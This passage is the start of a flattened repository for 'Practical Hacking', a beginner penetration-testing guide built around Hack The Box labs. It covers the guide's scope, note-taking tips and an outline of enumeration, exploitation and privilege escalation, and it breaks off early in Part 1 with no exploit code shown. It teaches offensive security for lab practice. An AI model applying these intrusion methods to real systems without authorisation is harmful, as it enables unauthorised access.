├── .gitbook └── assets │ ├── brainmachine003_schem2.jpg │ ├── e5f4c786-4709-4d66-bb9f-e605f788bc37.png │ ├── forrest-gump-running-photo-interesting-forrest-gump-beards-pinterest-of-forrest-gump-running-photo.jpg │ ├── image (1).png │ ├── image (10).png │ ├── image (11).png │ ├── image (12).png │ ├── image (13).png │ ├── image (14).png │ ├── image (15).png │ ├── image (16).png │ ├── image (17).png │ ├── image (18).png │ ├── image (19).png │ ├── image (2).png │ ├── image (20).png │ ├── image (21).png │ ├── image (22).png │ ├── image (23).png │ ├── image (24).png │ ├── image (25).png │ ├── image (26).png │ ├── image (27).png │ ├── image (28).png │ ├── image (29).png │ ├── image (3).png │ ├── image (30).png │ ├── image (31).png │ ├── image (32).png │ ├── image (33).png │ ├── image (34).png │ ├── image (35).png │ ├── image (36).png │ ├── image (37).png │ ├── image (38).png │ ├── image (39).png │ ├── image (4).png │ ├── image (40).png │ ├── image (41).png │ ├── image (42).png │ ├── image (43).png │ ├── image (44).png │ ├── image (45).png │ ├── image (46).png │ ├── image (47).png │ ├── image (48).png │ ├── image (49).png │ ├── image (5).png │ ├── image (50).png │ ├── image (51).png │ ├── image (52).png │ ├── image (53).png │ ├── image (54).png │ ├── image (55).png │ ├── image (56).png │ ├── image (57).png │ ├── image (58).png │ ├── image (59).png │ ├── image (6).png │ ├── image (60).png │ ├── image (61).png │ ├── image (62).png │ ├── image (63).png │ ├── image (64).png │ ├── image (7).png │ ├── image (8).png │ ├── image (9).png │ ├── image.png │ ├── logo-final-whitebg.png │ ├── reverseshelllistener.png │ ├── scanning-the-target.png │ ├── screenshot-2018-09-12-at-09.27.02 (1).png │ ├── screenshot-2018-09-12-at-09.27.02.png │ └── screenshot-2018-09-12-at-09.28.21.png ├── README.md ├── SUMMARY.md ├── before-you-start.md ├── part-1-how-to-hack.md ├── part-2-hacking-manually.md ├── part-3-web-hacking.md ├── part-4-privilege-escalation.md ├── preparation.md └── what-now.md /.gitbook/assets/brainmachine003_schem2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/brainmachine003_schem2.jpg -------------------------------------------------------------------------------- /.gitbook/assets/e5f4c786-4709-4d66-bb9f-e605f788bc37.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/e5f4c786-4709-4d66-bb9f-e605f788bc37.png -------------------------------------------------------------------------------- /.gitbook/assets/forrest-gump-running-photo-interesting-forrest-gump-beards-pinterest-of-forrest-gump-running-photo.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/forrest-gump-running-photo-interesting-forrest-gump-beards-pinterest-of-forrest-gump-running-photo.jpg -------------------------------------------------------------------------------- /.gitbook/assets/image (1).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/image (1).png -------------------------------------------------------------------------------- /.gitbook/assets/image (10).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/image (10).png -------------------------------------------------------------------------------- /.gitbook/assets/image (11).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/image (11).png -------------------------------------------------------------------------------- /.gitbook/assets/image (12).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/image (12).png -------------------------------------------------------------------------------- /.gitbook/assets/image (13).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/image (13).png -------------------------------------------------------------------------------- /.gitbook/assets/image (14).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/image (14).png -------------------------------------------------------------------------------- /.gitbook/assets/image (15).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/image (15).png -------------------------------------------------------------------------------- /.gitbook/assets/image (16).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/image (16).png -------------------------------------------------------------------------------- /.gitbook/assets/image (17).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/image (17).png -------------------------------------------------------------------------------- /.gitbook/assets/image (18).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/image (18).png -------------------------------------------------------------------------------- /.gitbook/assets/image (19).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/image (19).png -------------------------------------------------------------------------------- /.gitbook/assets/image (2).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/image (2).png -------------------------------------------------------------------------------- /.gitbook/assets/image (20).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/image (20).png -------------------------------------------------------------------------------- /.gitbook/assets/image (21).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/image (21).png -------------------------------------------------------------------------------- /.gitbook/assets/image (22).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/image (22).png -------------------------------------------------------------------------------- /.gitbook/assets/image (23).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/image (23).png -------------------------------------------------------------------------------- /.gitbook/assets/image (24).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/image (24).png -------------------------------------------------------------------------------- /.gitbook/assets/image (25).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/image (25).png -------------------------------------------------------------------------------- /.gitbook/assets/image (26).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/image (26).png -------------------------------------------------------------------------------- /.gitbook/assets/image (27).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/image (27).png -------------------------------------------------------------------------------- /.gitbook/assets/image (28).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/image (28).png -------------------------------------------------------------------------------- /.gitbook/assets/image (29).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/image (29).png -------------------------------------------------------------------------------- /.gitbook/assets/image (3).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/image (3).png -------------------------------------------------------------------------------- /.gitbook/assets/image (30).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/image (30).png -------------------------------------------------------------------------------- /.gitbook/assets/image (31).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/image (31).png -------------------------------------------------------------------------------- /.gitbook/assets/image (32).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/image (32).png -------------------------------------------------------------------------------- /.gitbook/assets/image (33).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/image (33).png -------------------------------------------------------------------------------- /.gitbook/assets/image (34).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/image (34).png -------------------------------------------------------------------------------- /.gitbook/assets/image (35).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/image (35).png -------------------------------------------------------------------------------- /.gitbook/assets/image (36).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/image (36).png -------------------------------------------------------------------------------- /.gitbook/assets/image (37).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/image (37).png -------------------------------------------------------------------------------- /.gitbook/assets/image (38).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/image (38).png -------------------------------------------------------------------------------- /.gitbook/assets/image (39).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/image (39).png -------------------------------------------------------------------------------- /.gitbook/assets/image (4).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/image (4).png -------------------------------------------------------------------------------- /.gitbook/assets/image (40).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/image (40).png -------------------------------------------------------------------------------- /.gitbook/assets/image (41).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/image (41).png -------------------------------------------------------------------------------- /.gitbook/assets/image (42).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/image (42).png -------------------------------------------------------------------------------- /.gitbook/assets/image (43).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/image (43).png -------------------------------------------------------------------------------- /.gitbook/assets/image (44).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/image (44).png -------------------------------------------------------------------------------- /.gitbook/assets/image (45).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/image (45).png -------------------------------------------------------------------------------- /.gitbook/assets/image (46).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/image (46).png -------------------------------------------------------------------------------- /.gitbook/assets/image (47).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/image (47).png -------------------------------------------------------------------------------- /.gitbook/assets/image (48).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/image (48).png -------------------------------------------------------------------------------- /.gitbook/assets/image (49).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/image (49).png -------------------------------------------------------------------------------- /.gitbook/assets/image (5).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/image (5).png -------------------------------------------------------------------------------- /.gitbook/assets/image (50).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/image (50).png -------------------------------------------------------------------------------- /.gitbook/assets/image (51).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/image (51).png -------------------------------------------------------------------------------- /.gitbook/assets/image (52).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/image (52).png -------------------------------------------------------------------------------- /.gitbook/assets/image (53).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/image (53).png -------------------------------------------------------------------------------- /.gitbook/assets/image (54).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/image (54).png -------------------------------------------------------------------------------- /.gitbook/assets/image (55).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/image (55).png -------------------------------------------------------------------------------- /.gitbook/assets/image (56).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/image (56).png -------------------------------------------------------------------------------- /.gitbook/assets/image (57).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/image (57).png -------------------------------------------------------------------------------- /.gitbook/assets/image (58).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/image (58).png -------------------------------------------------------------------------------- /.gitbook/assets/image (59).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/image (59).png -------------------------------------------------------------------------------- /.gitbook/assets/image (6).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/image (6).png -------------------------------------------------------------------------------- /.gitbook/assets/image (60).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/image (60).png -------------------------------------------------------------------------------- /.gitbook/assets/image (61).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/image (61).png -------------------------------------------------------------------------------- /.gitbook/assets/image (62).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/image (62).png -------------------------------------------------------------------------------- /.gitbook/assets/image (63).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/image (63).png -------------------------------------------------------------------------------- /.gitbook/assets/image (64).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/image (64).png -------------------------------------------------------------------------------- /.gitbook/assets/image (7).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/image (7).png -------------------------------------------------------------------------------- /.gitbook/assets/image (8).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/image (8).png -------------------------------------------------------------------------------- /.gitbook/assets/image (9).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/image (9).png -------------------------------------------------------------------------------- /.gitbook/assets/image.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/image.png -------------------------------------------------------------------------------- /.gitbook/assets/logo-final-whitebg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/logo-final-whitebg.png -------------------------------------------------------------------------------- /.gitbook/assets/reverseshelllistener.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/reverseshelllistener.png -------------------------------------------------------------------------------- /.gitbook/assets/scanning-the-target.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/scanning-the-target.png -------------------------------------------------------------------------------- /.gitbook/assets/screenshot-2018-09-12-at-09.27.02 (1).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/screenshot-2018-09-12-at-09.27.02 (1).png -------------------------------------------------------------------------------- /.gitbook/assets/screenshot-2018-09-12-at-09.27.02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/screenshot-2018-09-12-at-09.27.02.png -------------------------------------------------------------------------------- /.gitbook/assets/screenshot-2018-09-12-at-09.28.21.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chryzsh/practical-hacking/9ad5be35689eb26b2fc20d66a9f7982c81d7027c/.gitbook/assets/screenshot-2018-09-12-at-09.28.21.png -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: >- 3 | This is a written guide for learning how to hack. We call it Practical 4 | Hacking! 5 | --- 6 | 7 | # Introduction 8 | 9 | ### About Practical Hacking 10 | 11 | Practical Hacking is a four part guide to learning how to hack computers, where each part has a specific subject. The details are outlined at the bottom of this article. If something in the guide is unclear notify us so we can improve it. We are not afraid of criticism, nor comments! 12 | 13 | 14 | ### Who are we? 15 | 16 | Two humble pentesters from Norway. We like to talk and write a lot about security and hacking. And we both love to share our knowledge! 17 | 18 | 19 | ![chryzsh](.gitbook/assets/brainmachine003_schem2.jpg) 20 | 21 | ![Infernux](.gitbook/assets/forrest-gump-running-photo-interesting-forrest-gump-beards-pinterest-of-forrest-gump-running-photo.jpg) 22 | 23 | ### **Hacking vs Penetration testing** 24 | 25 | This guide is purposefully devoid of the words "penetration testing" and we only refer to what we teach as "hacking". Although the guide it covers both a general approach, techniques and numerous tools used in penetration testing, we are hesitant to call it that simply because penetration testing covers a much wider area that includes scoping, reporting and threat modeling. This guide is merely a basic practical introduction to some of the aspects involved in penetration testing. 26 | 27 | The Penetration Testing Execution Standard \(PTES\) PTES defines penetration testing as 7 phases. 28 | 29 | * Pre-engagement Interactions 30 | * **Intelligence Gathering** 31 | * Threat Modeling 32 | * **Vulnerability Analysis** 33 | * **Exploitation** 34 | * **Post Exploitation** 35 | * Reporting 36 | 37 | Safe to say, this guide only involves the activities marked in bold text, as we won't teach anybody how to write a report. The basics of hacking however, shall be taught thoroughly. 38 | 39 | ### [**Hack The Box**](https://www.youtube.com/watch?v=CxtMMgqfXY8) 40 | 41 | ![](.gitbook/assets/logo-final-whitebg.png) 42 | 43 | The guide is based on using a well renowned platform called Hack The Box \(HTB\) to practice the acquired skills. HTB has gained vast popularity in the hacker community and has now more than 70 different machines. If machines in the course are for some reason unavailable or retired, there are usually alternatives in the active machines category of HTB that covers the same subjects. 44 | 45 | There are two categories of machines at the moment, Active and Retired. The former is machines that are available with Free subscription. The latter is available for VIP subscriptions. Most of the machines mentioned in this guide are available either through free or VIP labs. 46 | 47 | HTB is an excellent platform for such training and in the courses held we have provided assistance in hacking boxes and ocasionally done some walkthroughs when everybody has done a box. However, because this is an Internet accessible article series we can't provide any written solutions to boxes. We do however try to provide you with all the information and tools required to figure out how to hack these boxes on your own. If you require further assistance check out the social channel listed in the [Preparation](preparation.md) part of this guide. 48 | 49 | ## Hacking in four parts 50 | 51 | To get you started we have broken this guide into four major parts and some preparation stages. 52 | 53 | ### Preparation 54 | 55 | Gets you set up with a Kali Linux virtual machine for hacking and registered on Hackthebox, the platform we will use to practice our hacking skills. 56 | 57 | ### Before you start 58 | 59 | Some words of caution and tips on hacking as efficiently as possible. 60 | 61 | ### **Part 1 - How to hack** 62 | 63 | A methodical approach to hacking invidiual boxes, mostly by using automatic tools. 64 | 65 | ### **Part 2 - Hacking manually** 66 | 67 | Taking the step beyond automatic tools to get an understanding of what hacking really is. 68 | 69 | ### **Part 3 - Web hacking** 70 | 71 | Introduction to the vast world of of web hacking. 72 | 73 | ### **Part 4 - Privilege escalation** 74 | 75 | Goes deeper into the subject of escalating privileges. 76 | 77 | 78 | 79 | ![](.gitbook/assets/image%20%2855%29.png) 80 | 81 | {% hint style="warning" %} 82 | This is not 'Nam, this is hacking. There are rules. 83 | 84 | _Don't be a dumbass!_ 85 | 86 | Don't try to hack your employer, newspaper, school or anyone else. Don't launch any random tools you find on the internet. Don't execute commands if you don't know what it does. 87 | 88 | Do however, practice the things you learn in this course in a fantastic lab environment such as Hackthebox. 89 | {% endhint %} 90 | 91 | 92 | 93 | ![](https://lh3.googleusercontent.com/UQNc-yalPl6TPNKbxfVFDBfjsHmILD38J5FaWfcdgrlimdO_2u2C98npBMSuxw0uRYP7DIdLPxS0hosnCI9ZwVeT9APu6ivvWT_1T-h2SPfNOwOKKre74f2u30R8aEZQPrLUns5n1Sk) 94 | 95 | -------------------------------------------------------------------------------- /SUMMARY.md: -------------------------------------------------------------------------------- 1 | # Table of contents 2 | 3 | * [Introduction](README.md) 4 | * [Preparation](preparation.md) 5 | * [Before you start](before-you-start.md) 6 | * [Part 1 - How to hack](part-1-how-to-hack.md) 7 | * [Part 2 - Hacking manually](part-2-hacking-manually.md) 8 | * [Part 3 - Web hacking](part-3-web-hacking.md) 9 | * [Part 4 - Privilege escalation](part-4-privilege-escalation.md) 10 | * [What now?](what-now.md) 11 | 12 | -------------------------------------------------------------------------------- /before-you-start.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: Some basics that are important to know before you start hacking 3 | --- 4 | 5 | # Before you start 6 | 7 | ## **Note taking** 8 | 9 | Before we begin hacking, we wish to emphasise the importance of taking notes. You are going to have a hard time when you try to go back to boxes after 6 months, and discover you didn't even bother to jot down the IP address of the machine. You won't remember what you did, and you won't remember the exact commands you used. We have all done this, numerous times and it's the same every time. There is a huge gap in skill level and satisfaction for those that start taking notes from the beginning as opposed to those that don't. 10 | 11 | We know taking notes is boring. Because who reads their notes anyway, right? But trust us on this! Even if you have excellent photographic memory, you want to be able to just copypaste your notes over to a buddy that wants to know how you did it or maybe make a beautiful looking writeup to show off to your hacker friends. 12 | 13 | We won't force any specific note taking tool upon you, so if you want to use notepad.exe we're cool with that. Finding a good structure and workflow is the most important thing. Try not to let note taking distract you from the creative process of hacking. It's easy to get caught up in formatting and organizing notes, so try to avoid that. Note taking is already boring, don't make it even more boring and time consuming. Just write down the essentials in any form you like and then spend time after you have rooted the box to format and make it neat for later. 14 | 15 | ### **Tips from chryzsh** 16 | 17 | I \(chryzsh\) have recently adopted a method where I write in prosaic form what I did for each command in my notes. I also record every single command by copy-pasting it into my notes. When I'm done with a box I try to make a little write-up for myself. This makes it easier to reference later, especially if the notes are full of scan results from different tools. 18 | 19 | For the time being I use VScode with something as plain as txt files in a very simple folder structure saved to a directory in Google Drive. I give the files names on their last octet of the IP address on HTB. Example: `Google Drive/Hacking/labs/htb/75-nibbles.txt` 20 | 21 | You are of course free to take notes however you like! 22 | 23 | ### **Tips from Infernux** 24 | 25 | I've been using OneNote since the beginning, organizing my files like this: 26 | 27 | ![Example OneNote layout](.gitbook/assets/image%20%2831%29.png) 28 | 29 | It's also a good idea to create a folder for HTB and making a new folder for each machine, putting all the files you use \(scripts, shells, etc\) in that folder, to keep it organized. If you start out being organized it'll help you down the road. You'll always go back to your notes and scripts! 30 | 31 | ### TLDR note taking 32 | 33 | Make a new notes file for each box. When you are hacking, put all these things in the file continuously: 34 | 35 | * Scan results 36 | * Commands you used 37 | * Important findings 38 | * Exploit and vulnerability links 39 | * Code snippets 40 | * Flags 41 | 42 | ### Tips 43 | 44 | * Keepnote is built in to Kali if you want to take notes there 45 | * OneNote is a popular tool for organized note-taking 46 | * Take backups of your notes \(Kind of boring\) 47 | * Review your notes after each box and do some basic formatting \(Boring\) 48 | * Make an additional document / note with useful commands and tricks \(super important\) 49 | 50 | -------------------------------------------------------------------------------- /part-1-how-to-hack.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: >- 3 | The first part is a general introduction in the method that is hacking 4 | individual machines. How do we hackers go from no access to full access? 5 | --- 6 | 7 | # Part 1 - How to hack 8 | 9 | ## What do you learn in this part? 10 | 11 | * What is hacking? 12 | * Four steps involved in hacking machines 13 | * Using Metasploit to hack 14 | * Hacking an actual machine! 15 | 16 | **Boxes on HTB that are suitable for this part** 17 | 18 | * Lame - 10.10.10.3 19 | * Blue - 10.10.10.40 20 | 21 | **If you are looking for a challenge** 22 | 23 | * Granny 24 | * Grandpa 25 | * Legacy 26 | * Optimum 27 | 28 | ## Using Hackthebox 29 | 30 | In case you decided to skip the preparation stages, [Hackthebox](https://www.hackthebox.eu/invite) is the platform we will be using in this guide to allow you to practice your hacking skills. 31 | 32 | Hacking machines on Hackthebox is somewhat similar to hacking in the real world. The HTB lab consiats of a number of independent boxes that are not connected to each other. That means each machine must be hacked individually. **The main goal of "hacking" is to gain command line / terminal access to the target machine with the highest privilege possible**. We usually achieve some form of command line access to target through what is called "code execution". That means you have found a way to execute arbitrary code on the target and hence you can start taking control over it. 33 | 34 | Usually, you gain access as a user or service account. The next challenge then becomes to escalate your privileges to the highest possible level. That means, if you are a regular user or a service account, you want to become administrator. Another flag is made available only through access with this level of privilege. 35 | 36 | For each machine there is a flag that proves you have gained access to the machine, regardless of privilege. There are two flags: **user.txt** and **root.txt**. Getting access to the machine as a regular user gives you the user flag, while getting access as `root` or `Administrator` access gives you both flags. The flags are simply unqiue MD5 strings that looks something like this:`bb1d10195b0a54e350cg015009a8095y` 37 | 38 | #### Submitting flags on Hackthebox 39 | 40 | After you have successfully compromised and gained access to a box, and found the flags, they must be submitted by pressing the two icons on the right in the machines panel on HTB. Flags provde that you completed the box and for each flag you get a certain number of points, depending on the difficulty of the machine. Some boxes are built in such a way that compromising them might give you administrative access straight away. If so, you can grab both flags, because with administrative privileges we have full access to everything on the machine. 41 | 42 | ![The two rightmost buttons on each machine opens a flag submission panel](.gitbook/assets/image%20%2811%29.png) 43 | 44 | Depending on whether the operating system is Windows or Linux, the flags on the machines are usually located in the places listed below. The `` is the username of theu ser on the machine, which is different on all the boxes. The Administrator user is usually not renamed, but it can happen that flags are hidden, so beware. 45 | 46 | **Windows** 47 | 48 | * `C:\Documents and Settings\\Desktop\user.txt` 49 | * `C:\Documents and Settings\Administrator\Desktop\root.txt` 50 | 51 | **Linux** 52 | 53 | * `/home//user.txt` 54 | * `/root/root.txt` 55 | 56 | ## How to hack 57 | 58 | This is a highly simplified approach to hacking invidiual boxes with four major steps that are explained in further detail below. 59 | 60 | 1. **Enumeration** 61 | 2. **Vulnerability analysis** 62 | 3. **Exploitation** 63 | 4. **Privilege escalation** 64 | 65 | ## **1 - Enumeration** 66 | 67 | **Goal** - Gather information about the target 68 | 69 | **Tools** - ****Nmap, web browser 70 | 71 | **First things first -** Read carefully and write down everything you see on the screen. This may sound a bit weird, but we truly want you to write down any name, software, technology, email address or unknown factor that you discover when hacking. **The devil is in the detail**. The fact that you did not write down the name of that piece of software may lead you to an abrupt halt later down the road. 72 | 73 | ### F**ind IP address, open ports and services** 74 | 75 | First, we want to find the IP address of the target. Since we are using HTB as a platform this is given in the left 